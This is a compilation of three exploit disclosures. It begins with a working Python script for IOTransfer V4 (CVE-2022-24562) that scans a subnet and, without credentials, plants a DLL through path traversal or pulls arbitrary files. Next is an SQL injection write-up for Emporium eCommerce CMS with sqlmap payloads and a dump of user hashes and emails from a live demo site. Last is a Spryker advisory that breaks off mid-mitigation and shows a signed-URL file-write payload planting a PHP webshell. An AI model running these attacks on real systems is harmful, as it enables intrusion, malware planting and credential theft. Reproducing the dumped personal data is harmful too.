# Exploit Title: IOTransfer V4 – Remote Code Execution (RCE)
# Date: 06/22/2022
# Exploit Author: Tomer Peled
# Vendor Homepage: https://www.iobit.com
# Software Link: https://iotransfer.itopvpn.com/
# Version: V4 and onward
# Tested on: Windows 10
# CVE : 2022-24562
# References: https://github.com/tomerpeled92/CVE/tree/main/CVE-2022%E2%80%9324562
#
# Reviewer summary (what the code below visibly does):
# - ScanIP() sweeps <Range>.142 .. <Range>.250 on TCP 7193 and treats the first
#   host whose reply to ``action=getpcname&userid=*`` parses as JSON with a
#   ``content.name`` field as vulnerable.
# - "Upload" mode rewrites the service's ``tasksavepath`` to ``C:\Program ``
#   via ``action=setiotconfig``, creates a task, registers a detail node whose
#   ``savefilename``/``name`` is a caller-chosen string (the default starts
#   with ``../``), then POSTs raw file bytes to ``action=newuploadfile``.
# - "Download" mode creates a task with an arbitrary ``filepath`` and fetches
#   it via ``action=downloadfile``.
# Every request carries the wildcard ``userid=*`` and no credential of any kind.
# Detection: HTTP to TCP/7193 with ``userid=*`` combined with
# ``action=setiotconfig``, ``newuploadfile`` or ``downloadfile``, and
# ``savefilename`` values containing ``../``.  Mitigation: keep port 7193
# unreachable from untrusted networks and follow the vendor/CVE references above.

import os
from urllib3.exceptions import ConnectTimeoutError
from win32com.client import *
import requests
import json

# Operator-edited settings; there is no argument parsing in this script.
localPayloadPath = r"c:\temp\malicious.dll"   # local file sent in "Upload" mode
remotePayloadPath="../Program Files (x86)/Google/Update/goopdate.dll"   # savefilename sent to the service; note the leading "../"
remoteDownloadPath = r'C:\Users\User\Desktop\obligationservlet.pdf'   # remote path requested in "Download" mode
Range = "192.168.89"   # first three octets of the /24 that ScanIP() sweeps
UpOrDown="Upload"      # "Upload" or "Download"; any other value does nothing after the scan
IP = ""
UserName = ""

def get_version_number(file_path: str) -> str:
    """Return the Windows file-version string of *file_path* using the
    ``Scripting.FileSystemObject`` COM object (pywin32 ``Dispatch``).

    Windows-only.  Not called from ``__main__`` below.
    """
    information_parser = Dispatch("Scripting.FileSystemObject")
    version = information_parser.GetFileVersion(file_path)
    return version


def getTaskList(IP, taskid=""):
    """Fetch the service's task list for the wildcard user and print a line
    when *taskid* appears in it.

    Issues ``GET /index.php?action=gettasklist&userid=*`` on port 7193 and
    decodes the doubly JSON-encoded ``content`` field.  No return value and
    no error handling: a non-JSON reply raises ValueError, a missing key
    raises KeyError.  Not called from ``__main__`` below.
    """
    print("Getting task list...")
    url = f'http://{IP}:7193/index.php?action=gettasklist&userid=*'
    res = requests.get(url)
    tasks = json.loads(res.content)
    tasks = json.loads(tasks['content'])   # 'content' is itself a JSON document
    for task in tasks['tasks']:
        if taskid == task['taskid']:
            print(f"Task ID found: {taskid}")


def CreateUploadTask(IP):
    """Create an upload task on the remote service and return its ``taskid``.

    Calls :func:`SetSavePath` first (which rewrites the service-wide
    ``tasksavepath``), then POSTs ``action=createtask`` with ``userid='*'``.
    Raises ValueError/KeyError if the reply is not the expected doubly
    JSON-encoded structure.
    """
    SetSavePath(IP)
    url = f'http://{IP}:7193/index.php?action=createtask'
    task = {
        'method': 'get',
        'version': '1',
        'userid': '*',
        'taskstate': '0',
    }
    res = requests.post(url, json=task)
    task = json.loads(res.content)
    task = json.loads(task['content'])   # nested JSON, as in getTaskList()
    taskid = task['taskid']
    print(f"[*] TaskID: {taskid}")
    return taskid


def CreateUploadDetailNode(IP, taskid, remotePath, size='100'):
    """Register detail entry ``index=0`` of *taskid* with the service.

    ``savefilename`` and ``name`` are both set to *remotePath*; presumably the
    service uses it as the storage name for the upload, which is why the
    default value begins with ``../`` (not verifiable from this script).
    ``fullpath`` and ``md5`` are fixed filler values -- nothing here shows the
    service checking them.  *size* is transmitted as a string.  Prints the
    reply's ``code`` field; raises on a non-JSON reply.
    """
    url = f'http://{IP}:7193/index.php?action=settaskdetailbyindex&userid=*&taskid={taskid}&index=0'
    file_info = {
        'size': size,
        'savefilename': remotePath,
        'name': remotePath,
        'fullpath': r'c:\windows\system32\calc.exe',   # filler; unrelated to the uploaded file
        'md5': 'md5md5md5md5md5',                      # filler; not a real digest
        'filetype': '3',
    }
    res = requests.post(url, json=file_info)
    js = json.loads(res.content)
    print(f"[V] Create Detail returned: {js['code']}")


def readFile(Path):
    """Return the entire contents of *Path* as ``bytes``.

    Reads one byte, then alternates 1023-byte and 1-byte reads until a
    1-byte read returns ``b''``; the net effect equals a single
    ``file.read()``.  The handle is closed with an explicit ``close()`` rather
    than ``with``, so it leaks if a read raises.
    """
    file = open(Path, "rb")
    byte = file.read(1)
    next = "Start"   # shadows the builtin; only used as a loop sentinel
    while next != b'':
        byte = byte + file.read(1023)
        next = file.read(1)
        if next != b'':
            byte = byte + next
    file.close()
    return byte


def CallUpload(IP, taskid, localPayloadPath):
    """POST the raw bytes of *localPayloadPath* to ``action=newuploadfile``
    for detail ``index=0`` of *taskid* and print whether ``code`` was 200.

    The bare ``except:`` swallows every exception from the first attempt
    (KeyboardInterrupt included) and repeats the identical POST once; the
    retry additionally treats a reply whose ``error`` field contains the
    substring ``"false"`` as success.
    """
    url = f'http://{IP}:7193/index.php?action=newuploadfile&userid=*&taskid={taskid}&index=0'
    send_data = readFile(localPayloadPath)
    try:
        res = requests.post(url, data=send_data)
        js = json.loads(res.content)
        if js['code'] == 200:
            print("[V] Success payload uploaded!")
        else:
            print(f"CreateRemoteFile: {res.content}")
    except:
        print("[*] Reusing the task...")
        res = requests.post(url, data=send_data)
        js = json.loads(res.content)
        if js['code'] == 200 or "false" in js['error']:
            print("[V] Success payload uploaded!")
        else:
            print(f"[X] CreateRemoteFile Failed: {res.content}")


def SetSavePath(IP):
    """Overwrite the service's ``tasksavepath`` setting with ``'C:\\Program '``
    (note the trailing space) via ``action=setiotconfig``.

    The response is discarded, so a failure here is silent.  A service-wide
    configuration change accepted from a request that carries no credential
    is the step most worth alerting on.
    """
    url = f'http://{IP}:7193/index.php?action=setiotconfig'
    config = {
        'tasksavepath': 'C:\\Program '
    }
    requests.post(url, json=config)

def ExploitUpload(IP,payloadPath,rPath,taskid=None):
    """Run the full upload sequence: create a task (unless *taskid* is
    given), register the detail node with the local file's real size, then
    send the bytes.

    ``size`` comes from ``os.path.getsize`` and is passed as a decimal string.
    """
    if not taskid:
        taskid = CreateUploadTask(IP)
    size = os.path.getsize(payloadPath)
    CreateUploadDetailNode(IP, taskid, remotePath=rPath, size=str(size))
    CallUpload(IP, taskid, payloadPath)


def CreateDownloadTask(IP, Path) -> str:
    """Create a task whose ``filepath`` is *Path* (a path on the remote host)
    and return its ``taskid``.

    Same request shape as :func:`CreateUploadTask` plus ``filepath``, but
    without the :func:`SetSavePath` call.
    """
    url = f'http://{IP}:7193/index.php?action=createtask'
    task = {
        'method': 'get',
        'version': '1',
        'userid': '*',
        'taskstate': '0',
        'filepath': Path
    }
    res = requests.post(url, json=task)
    task = json.loads(res.content)
    task = json.loads(task['content'])
    taskid = task['taskid']
    print(f"TaskID: {taskid}")
    return taskid


def ExploitDownload(IP, DownloadPath, ID=None):
    """GET ``action=downloadfile`` for an existing task *ID*, or for a new
    task created from *DownloadPath*, and return the ``requests`` response.

    *DownloadPath* is ignored when *ID* is given.
    """
    if ID:
        url = f'http://{IP}:7193/index.php?action=downloadfile&userid=*&taskid={ID}'
    else:
        taskid = CreateDownloadTask(IP, DownloadPath)
        url = f'http://{IP}:7193/index.php?action=downloadfile&userid=*&taskid={taskid}'
    res = requests.get(url)
    return res

def ScanIP(startRange: str) -> tuple:
    """Probe hosts in ``<startRange>.x`` on TCP 7193 and return
    ``(ip, pc_name)`` for the first one whose ``action=getpcname&userid=*``
    reply decodes to JSON with a ``content.name`` field; ``(None, None)``
    otherwise.

    Each probe has a 1 s timeout.  ``except Exception`` absorbs every failure
    (timeouts, refused connections, bad JSON, missing keys) and moves on, so
    the following ``except ConnectTimeoutError`` clause is unreachable
    (ConnectTimeoutError is an Exception subclass).  Because ``IP`` is rebuilt
    from ``Current`` before ``Current`` is incremented, the loop probes .142
    twice and stops at .250; .251 is never probed.
    """
    print("[*] Searching for vulnerable IPs", end='')
    Current = 142
    IP = f"{startRange}.{Current}"
    VulnerableIP: str = ""
    UserName: str = ""
    while Current < 252:
        print(".", end='')
        url = f'http://{IP}:7193/index.php?action=getpcname&userid=*'
        try:
            res = requests.get(url, timeout=1)
            js = json.loads(res.content)
            js2 = json.loads(js['content'])
            UserName = js2['name']
            VulnerableIP=IP
            print(f"\n[V] Found a Vulnerable IP: {VulnerableIP}")
            print(f"[!] Vulnerable PC username: {UserName}")
            return VulnerableIP,UserName
        except Exception as e:
            pass
        except ConnectTimeoutError:   # unreachable, see docstring
            pass
        IP = f"{startRange}.{Current}"   # uses the pre-increment value
        Current = Current + 1
    return None,None


if __name__ == '__main__':
    # Sweep first; stop if no host answered the probe.
    IP,UserName = ScanIP(Range)
    if IP is None or UserName is None:
        print("[X] No vulnerable IP found")
        exit()
    print("[*] Starting Exploit...")
    if UpOrDown == "Upload":
        print(f"[*]Local Payload Path: {localPayloadPath}")
        print(f"[*]Remote Upload Path: {remotePayloadPath}")
        ExploitUpload(IP,localPayloadPath,remotePayloadPath)
    elif UpOrDown == "Download":
        print(f"[*] Downloading the file: {remoteDownloadPath}")
        res = ExploitDownload(IP, remoteDownloadPath)
        # The response body is written to ./out.pdf whatever the remote file was.
        file = open("out.pdf", "wb+")
        file.write(res.content)
        file.close()
<pre><code>┌┌────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr │ │ :<br />│ Website : mybizcms.com │ │ │<br />│ Vendor : mybizcms │ │ │<br />│ Software : Emporium eCommerce - │ │ │<br />│ Online Shopping CMS v 1.2 │ │ Emporium eCommerce │<br />│ Vuln Type: Remote SQL Injection │ │ │<br />│ Method : GET │ │ is a complete online │<br />│ Critical : High [░░▒▒▓▓██] │ │ shopping platform for all your needs │<br />│ Impact : Database Access │ │ │<br />│ │ │ │<br />│ ────────────────────────────────────────┘ └─────────────────────────────────────────│<br />│ B4nks-NET irc.b4nks.tk #unix ┌┘<br />└────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ Typically used for remotely exploitable vulnerabilities that can lead to │<br />│ system compromise. 
│<br />│ │<br />┌┌────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /> Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk<br /> loool, DevS, Dark-Gost<br /> CryptoJob (Twitter) twitter.com/CryptozJob<br />┌┌────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />There's 4 parameters Vulnerable to SQL Injection in /categories/other-categories?<br /><br /><br />GET parameter 'min_price' is vulnerable<br /><br />---<br />Parameter: min_price (GET)<br /> Type: error-based<br /> Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)<br /> Payload: min_price=(UPDATEXML(5880,CONCAT(0x2e,0x7176787a71,(SELECT (ELT(5880=5880,1))),0x716b707071),2936))&max_price=145000&storage[]=41<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)<br /> Payload: min_price=(SELECT 3031 FROM (SELECT(SLEEP(5)))qWqF)&max_price=145000&storage[]=41<br />---<br /><br />GET parameter 'percentage' is vulnerable.<br /><br />---<br />Parameter: percentage (GET)<br /> Type: boolean-based blind<br /> Title: MySQL boolean-based blind - Parameter replace (MAKE_SET)<br /> Payload: percentage=MAKE_SET(4728=4728,5649)<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: percentage=40 AND (SELECT 8890 FROM(SELECT COUNT(*),CONCAT(0x7170706b71,(SELECT (ELT(8890=8890,1))),0x717a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: percentage=40 AND (SELECT 9724 FROM 
(SELECT(SLEEP(5)))chdS)<br />---<br /><br />GET parameter 'review_ratings' is vulnerable<br /><br />---<br />Parameter: review_ratings (GET)<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: review_ratings=4 AND (SELECT 5450 FROM(SELECT COUNT(*),CONCAT(0x7170706b71,(SELECT (ELT(5450=5450,1))),0x717a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: review_ratings=4 AND (SELECT 2340 FROM (SELECT(SLEEP(5)))lpXn)<br />---<br /><br />GET parameter 'brand[]' is vulnerable<br /><br />---<br />Parameter: brand[] (GET)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: brand[]=15') AND 3512=3512 AND ('Othl'='Othl<br /><br /> Type: stacked queries<br /> Title: MySQL >= 5.0.12 stacked queries (comment)<br /> Payload: brand[]=15');SELECT SLEEP(5)#<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: brand[]=15') AND (SELECT 9038 FROM (SELECT(SLEEP(5)))hyaE) AND ('KJgc'='KJgc<br />---<br /><br />Live Demo Site:<br /><br />https://mybizcms.com/demos/multivendor/<br /><br /><br />[+] Starting the Attack<br /><br />sqlmap.py -u "https://mybizcms.com/demos/multivendor/categories/other-categories?brand%5B%5D=15" --current-db --batch --random-agent<br /><br />[INFO] the back-end DBMS is MySQL<br />web application technology: Apache, PHP 7.3.33, PHP<br />back-end DBMS: MySQL >= 5.0 (MariaDB fork)<br />[INFO] fetching current database<br />current database: 'mybizcms_multivendor'<br /><br /><br />fetching tables for database: 'mybizcms_multivendor'<br />[101 tables]<br /> <br />+--------------------------+<br />| returns |<br />| ad_placements |<br />| addresses |<br />| ads |<br />| attribute_items |<br />| attributes |<br />| authorize_net_settings 
|<br />| brands |<br />| categories |<br />| collections |<br />| company |<br />| counties |<br />| countries |<br />| credit_card_types |<br />| cronjobs |<br />| customers |<br />| deliveries |<br />| delivery_items |<br />| delivery_options |<br />| delivery_status |<br />| discounts |<br />| email_templates |<br />| facebook_settings |<br />| faqs |<br />| flash_sale_items |<br />| flash_sales |<br />| flutterwave_settings |<br />| github_settings |<br />| google_settings |<br />| item_status |<br />| labels |<br />| linkedin_settings |<br />| logs |<br />| media |<br />| mpesa_settings |<br />| newsletters |<br />| notifications |<br />| options |<br />| order_details |<br />| order_items |<br />| order_status |<br />| orders |<br />| pages |<br />| payment_options |<br />| payment_status |<br />| payments |<br />| payout_modes |<br />| payout_status |<br />| payouts |<br />| paypal_pro_settings |<br />| paypal_standard_settings |<br />| paytm_settings |<br />| payu_money_settings |<br />| permissions |<br />| pesapal_settings |<br />| pickup_stations |<br />| post_categories |<br />| post_comments |<br />| posts |<br />| product_attributes |<br />| product_images |<br />| product_reviews |<br />| product_stock |<br />| product_types |<br />| product_variants |<br />| product_wholesales |<br />| products |<br />| quicks |<br />| return_reasons |<br />| return_status |<br />| rewards |<br />| role_sub_permissions |<br />| roles |<br />| saved_items |<br />| sessions |<br />| shipping_fees |<br />| shipping_regions |<br />| shipping_weights |<br />| shops |<br />| sliders |<br />| stripe_settings |<br />| sub_permissions |<br />| subscribers |<br />| supported_currencies |<br />| tags |<br />| taxes |<br />| temp_data |<br />| ticket_priority |<br />| ticket_replies |<br />| ticket_status |<br />| tickets |<br />| timezones |<br />| twitter_settings |<br />| twocheckout_settings |<br />| user_status |<br />| user_sub_permissions |<br />| users |<br />| 
variant_choices |<br />| variant_options |<br />| wallets |<br />| weights |<br />+--------------------------+<br /> <br />fetching columns for table 'users' in database 'mybizcms_multivendor'<br /> <br />Table: users<br />[34 columns]<br /> <br />+------------------------+--------------+<br />| Column | Type |<br />+------------------------+--------------+<br />| calling_code | varchar(11) |<br />| city | varchar(100) |<br />| company | varchar(100) |<br />| country_id | int(11) |<br />| date_added | datetime |<br />| default_billing | int(11) |<br />| default_currency | int(11) |<br />| default_language | varchar(40) |<br />| default_shipping | int(11) |<br />| department_id | int(11) |<br />| email | varchar(100) |<br />| firstname | varchar(50) |<br />| last_ip | varchar(40) |<br />| last_login | datetime |<br />| last_password_change | datetime |<br />| lastname | varchar(50) |<br />| latitude | varchar(300) |<br />| longitude | varchar(300) |<br />| new_pass_key_requested | datetime |<br />| passkey | varchar(32) |<br />| password | varchar(256) |<br />| payout_address | longtext |<br />| payout_mode_id | int(11) |<br />| phone | varchar(30) |<br />| postal_code | varchar(100) |<br />| profile_image | varchar(150) |<br />| role_id | int(11) |<br />| state | varchar(50) |<br />| street | varchar(100) |<br />| user_id | int(11) |<br />| user_status_id | int(11) |<br />| user_uid | varchar(50) |<br />| username | varchar(100) |<br />| zip_code | varchar(15) |<br />+------------------------+--------------+<br /> <br />fetching entries of column(s) 'email,password,username' for table 'users' in database 'mybizcms_multivendor'<br /> <br />Database: mybizcms_multivendor<br />Table: users<br />[7 entries]<br /> <br />+----------+--------------------------------------------------------------+------------------------+<br />| username | password | email |<br />+----------+--------------------------------------------------------------+------------------------+<br />| 
admin | $2y$10$G1DsE2VvjMDBFvozlWr.X.H1dq.UgNhTYSrMHGftuollcDDr9OA2m | admin@mybizcms.com |<br />| one | $2y$10$G1DsE2VvjMDBFvozlWr.X.H1dq.UgNhTYSrMHGftuollcDDr9OA2m | evanskynot25@gmail.com |<br />| two | $2y$10$K27UTI0KPeP.N.6EzxED6eVgU6jcAJDq8vf.EuCxzGSEFdSyI/oeC | jdoe@gmail.con |<br />| umuruviq | $2y$10$SID3yybe763.xosi8qwqkOTG8baLQQpIVdfrYzqG9dTPhcTtVL5Bu | sync@mybizcms.com |<br />| three | $2y$10$iBnMAPE.3FDeivo2kYPhSerMS05TmbIZQ/bLD6FcmvCowStICaaw. | tew@gmail.com |<br />| user | $2y$10$eZ0/eOZ5R.Mwju4nCqIgHuaVnBosugt8ADjwMCDzQP6oUUH2l5NVK | user@mybizcms.com |<br />| tbjjrhls | $2y$10$XKA6hBkZlCAU3T7KcQm.7ubs06COQH4mCcGHmBMwzyYp016oBYoPe | vendor@mybizcms.com |<br />+----------+--------------------------------------------------------------+------------------------+<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code>Title<br />=====<br /><br />SCHUTZWERK-SA-2022-003: Remote Command Execution in Spryker Commerce OS<br /><br />Status<br />======<br /><br />PUBLISHED<br /><br />Version<br />=======<br /><br />1.0<br /><br />CVE reference<br />=============<br /><br />CVE-2022-28888<br /><br />Link<br />====<br /><br />https://www.schutzwerk.com/en/43/advisories/schutzwerk-sa-2022-003/<br /><br />Text-only version:<br />https://www.schutzwerk.com/advisories/SCHUTZWERK-SA-2022-003.txt<br /><br />Affected products/vendor<br />========================<br /><br />Spryker Commerce OS by Spryker Systems GmbH, with spryker/http module < <br />1.7.0<br /><br />Summary<br />=======<br /><br />A predictable value is used to sign and verify special _fragment URLs in<br />Spryker Commerce OS with spryker/http module < 1.7.0. Attackers that can <br />guess<br />this value are able to generate valid _fragment URLs which allow calling PHP<br />methods, with certain restrictions. It could be demonstrated that this <br />allows<br />attackers to write arbitrary content to files on the file system, which, in<br />turn, allows for execution of arbitrary PHP commands in many setups and<br />therefore remote command execution.<br /><br />Risk<br />====<br /><br />The vulnerability allows attackers to execute arbitrary commands on an<br />operating system-level on systems where the Spryker Commerce OS is <br />installed.<br />In many cases, authentication is not necessary for successful <br />exploitation. If<br />attackers have already determined that Spryker Commerce OS is utilized <br />through<br />fingerprinting, checking for the presence of the vulnerability is <br />trivial. 
With<br />the ability to execute arbitrary commands, attacks can, for example, access<br />customer data of the affected shop.<br /><br />Description<br />===========<br /><br />A webshop that was recently assessed for security vulnerabilities by <br />SCHUTZWERK<br />was found to contain a remote command execution vulnerability. The <br />application<br />in scope is based on a framework by Spryker -- Spryker Commerce OS. <br />Spryker's<br />framework, in turn, is based on Symfony[0] and/or Silex[1].<br /><br />Symfony and Silex both support a special _fragment endpoint. This <br />feature was<br />analyzed by Ambionics Security[2] in 2020. In their write up, the feature is<br />described as follows:<br /><br /> One of Symfony's built-in features, made to handle ESI (Edge-Side<br /> Includes)[3], is the FragmentListener class[4]. Essentially, when someone<br /> issues a request to /_fragment, this listener sets request attributes <br />from<br /> given GET parameters. Since this allows to run arbitrary PHP code [...],<br /> the request has to be signed using a HMAC value. [...]<br /><br /> [...] Given its importance, [the secret used for signing] must <br />obviously be<br /> very random.<br /><br />At least parts of the source code of the Spryker framework are open <br />source and<br />publicly accessible via GitHub. During the assessment, while certain<br />security-sensitive parts of the source code were reviewed, it was discovered<br />that the secret used to sign and verify _fragment URLs is static and<br />predictable. The secret is set to md5(__DIR__) in the PHP file<br />HttpFragmentServiceProvider.php[5] and in two different HttpConfig.php[6][7]<br />files.<br /><br />__DIR__ is a built-in "magic constant" in PHP[8] and it corresponds to "the<br />directory of the file". It is not entirely clear, which of these PHP <br />files is<br />actually included and loaded by the Spryker framework. 
However, it is <br />assumed<br />that the file http/src/Spryker/Shared/Http/HttpConfig.php is the culprit.<br /><br />Guessing the secret<br />^^^^^^^^^^^^^^^^^^^<br /><br />In order to gain a better understanding of the vulnerability, SCHUTZWERK <br />set up<br />a local Spryker development instance with a demo shop[9] in order to <br />allow for<br />more in-depth debugging.<br /><br />By inspecting the source code and adding appropriate debug statements, the<br />secret was identified as e3ae11e53f7c3d72da08784b9af763f9. This <br />corresponds to<br />the MD5 sum of the path<br />/data/shop/development/current/vendor/spryker/http/src/Spryker/Shared/Http:<br /><br />$ echo -n '/data/shop/development/current/vendor/spryker/http/src/Spryker/'\<br />'Shared/Http'| md5sum<br />e3ae11e53f7c3d72da08784b9af763f9 -<br /><br />The proof-of-concept script find_secret.py[10] was developed in order to<br />automate the process of identifying the secret based on a list of known <br />Spryker<br />paths. The script was executed as follows against the local development<br />instance and correctly identified the static secret:<br /><br />$ python3 find_secret.py --path-list known_spryker_paths.txt \<br />http://www.de.b2b-demo-shop.local/_fragment<br />[-] http://www.de.b2b-demo-shop.local/_fragment <br />2c03fc8fac1ff5204b56d4dbf879a3fc<br />[-] http://www.de.b2b-demo-shop.local/_fragment <br />f71e9665ffe0a0e3b54bbe7c2642d466<br />[-] http://www.de.b2b-demo-shop.local/_fragment <br />faf0d063ad6adf3776d59bc55a17aa5f<br />[+] http://www.de.b2b-demo-shop.local/_fragment <br />e3ae11e53f7c3d72da08784b9af763f9<br /> <br />(/data/shop/development/current/vendor/spryker/http/src/Spryker/Shared/Http)<br /><br />This verification step does not require authentication in the default<br />configuration. The script generates _fragment URLs based on a provided <br />list of<br />paths and detects whether the server views these URLs as valid (correctly<br />signed) or not. 
This distinction is made based on different observations <br />(e.g.<br />status code, response content, etc.).<br /><br />The same script was then executed against the customer's instance:<br /><br />$ python3 find_secret.py --path-list known_spryker_paths.txt \<br />[CUSTOMER_DOMAIN]/_fragment<br />[-] [CUSTOMER_DOMAIN]/_fragment e3ae11e53f7c3d72da08784b9af763f9<br />[-] [CUSTOMER_DOMAIN]/_fragment faf0d063ad6adf3776d59bc55a17aa5f<br />[-] [CUSTOMER_DOMAIN]/_fragment 8399015c0dbbf2162983fb7ad0ea6a9a<br />[-] [CUSTOMER_DOMAIN]/_fragment 8baff412797b1ddd80cd968e7446aa06<br />[...]<br />[-] [CUSTOMER_DOMAIN]/_fragment 2c03fc8fac1ff5204b56d4dbf879a3fc<br />[-] [CUSTOMER_DOMAIN]/_fragment d6de8df0b4ad55b15f198e06142dd0e6<br />[-] [CUSTOMER_DOMAIN]/_fragment d6de8df0b4ad55b15f198e06142dd0e6<br />[+] [CUSTOMER_DOMAIN]/_fragment 9c15f40d8e5610e89caf6f9b7a97be3b<br /> (/data/srv/yves/www/vendor/spryker/http/src/Spryker/Shared/Http)<br /><br />In this case, the identified secret 9c15f40d8e5610e89caf6f9b7a97be3b<br />corresponds to the path<br />/data/srv/yves/www/vendor/spryker/http/src/Spryker/Shared/Http.<br /><br />The installation path of the application can of course vary greatly between<br />installations. However, if customers use the official Docker guide <br />provided by<br />Spryker, it is likely that they will use the paths utilized in the <br />examples and<br />thus share a common installation path.<br /><br />Even if this is not the case, customers might share installation paths <br />between<br />multiple environments (development, production). A compromise of one<br />installation would therefore make a compromise of the other installations<br />likely.<br /><br />Signing URLs<br />^^^^^^^^^^^^<br /><br />In addition to the secret, a URL must be passed to the HMAC function to form<br />the signature. 
However, in both instances of the vulnerability that were<br />discovered during the assessment, the URL was the same as the external URL.<br />This might be true for all Commerce OS installations.<br /><br />With a valid secret and a URL, it is now possible to sign URLs. As shown <br />in the<br />write-up of Ambionics Security, it is generally possible to execute <br />arbitrary<br />commands using different methods (direct reference of a PHP class/method or<br />deserialization of PHP objects). However, neither approach worked, <br />likely<br />due to code changes made by Spryker to Symfony/Silex.<br /><br />Generally, the correct syntax for _fragment URLs is the following:<br /><br /><protocol>://<domain>/_fragment?_path=_controller=<controller <br />specification>&<br />_hash=<valid URL signature><br /><br />Through further analysis, an alternative approach was discovered. <br />Replacing the<br />value of the URL parameter _path in the listing above allows specifying PHP<br />classes with certain limitations (decoded and reformatted for increased<br />readability):<br /><br />_controller[]=Path\To\Class&<br />_controller[]=nameOfMethod&<br />arg1=value<br /><br />At least the following limitations apply:<br /><br />* Class must have no initialize function or, alternatively, an initialize<br />function without arguments<br />* Class must have a constructor without arguments<br /><br />While examining the source code for possible candidates, the Symfony class<br />Filesystem was discovered. This class meets the limitations and allows <br />writing<br />arbitrary content to a specified file path. 
The following payload was <br />created<br />(decoded and reformatted for increased readability):<br /><br />_controller[]=Symfony\Component\Filesystem\Filesystem&<br />_controller[]=appendToFile&<br />filename=SCHUTZWERK.php&<br />content=TEST<br /><br />The generated URL is as follows:<br /><br />http://www.de.b2b-demo-shop.local/_fragment?_path=_controller%255B%255D%3DSymfony%255C<br />Component%255CFilesystem%255CFilesystem%26_controller%255B%255D%3DappendToFile%26<br />filename%3D%252Ftmp%252Fschutzwerk.php%26content%3DTEST&<br />_hash=8Phw5nGDW%2FDgLe%2Fvpep0Exzz%2BIsptnd%2FyOb4G5CT12U%3D<br /><br />After execution, the content is written to the file:<br /><br />vagrant@vm-b2b-demo-shop / $ cat /tmp/schutzwerk.php<br />TEST<br /><br />With this primitive in place, it is possible to execute arbitrary PHP <br />code and<br />subsequently commands on an operating system level. To demonstrate this, the<br />following PHP code for a minimal webshell was appended to the file<br />/data/shop/development/current/public/Yves/maintenance/maintenance.php <br />in the<br />development instance:<br /><br />if(isset($_GET['pass'])){<br /> if($_GET['pass']=="yunn@swervIfUf3"){<br /> if(isset($_REQUEST['cmd'])){<br /> echo "<pre>";<br /> $cmd=($_REQUEST['cmd']);<br /> system($cmd);<br /> echo "</pre>";<br /> die;<br /> }<br /> }<br />}<br /><br />The generated URL is as follows:<br /><br />http://www.de.b2b-demo-shop.local/_fragment?_path=_controller%255B%255D%3DSymfony%255C<br />Component%255CFilesystem%255CFilesystem%26_controller%255B%255D%3DappendToFile%26<br />filename%3D%252Fdata%252Fshop%252Fdevelopment%252Fcurrent%252Fpublic%252FYves%252F<br />maintenance%252Fmaintenance.php%26content%3Dif%2528isset%2528%2524_GET%255B%2527pass<br />%2527%255D%2529%2529%257B%250A%2B%2Bif%2528%2524_GET%255B%2527pass%2527%255D%253D%25<br />3D%2522yunn@swervIfUf3%2522%2529%257B%250A%2B%2B%2B%2Bif%2528isset%2528%2524<br 
/>_REQUEST%255B%2527cmd%2527%255D%2529%2529%257B%250A%2B%2B%2B%2B%2B%2Becho%2B%2522%253Cpre<br />%253E%2522%253B%250A%2B%2B%2B%2B%2B%2B%2524cmd%253D%2528%2524_REQUEST%255B%2527cmd%2527<br />%255D%2529%253B%250A%2B%2B%2B%2B%2B%2Bsystem%2528%2524cmd%2529%253B%250A%2B%2B%2B%2B%2B<br />%2Becho%2B%2522%253C%252Fpre%253E%2522%253B%250A%2B%2B%2B%2B%2B%2Bdie%253B%250A%2B%2B%2B<br />%2B%257D%250A%2B%2B%257D%250A%257D&_hash=XAnTzw2Y6hhbyIwO7KQ9qdTHrFMQ%2BUKWrVqRCad6JHE%3D<br /><br />Afterwards, the file contains the following content:<br /><br /><?php<br />[...]<br />if (file_exists(__DIR__ . '/maintenance.marker')) {<br /> http_response_code(503);<br /> echo file_get_contents(__DIR__ . '/index.html');<br /> exit(0);<br />}<br />if(isset($_GET['pass'])){<br />if($_GET['pass']=="yunn@swervIfUf3"){<br /> if(isset($_REQUEST['cmd'])){<br /> echo "<pre>";<br /> $cmd=($_REQUEST['cmd']);<br /> system($cmd);<br /> echo "</pre>";<br /> die;<br /> }<br />}<br />}<br /><br />Since the PHP file maintenance.php is consulted for every request, the <br />injected<br />PHP webshell code can be executed using URLs similar to the following:<br /><br />http://www.de.b2b-demo-shop.local/?pass=yunn@swervIfUf3&cmd=id<br /><br />Solution/Mitigation<br />===================<br /><br />1. Update spryker/http module to version 1.7.0<br />2. 
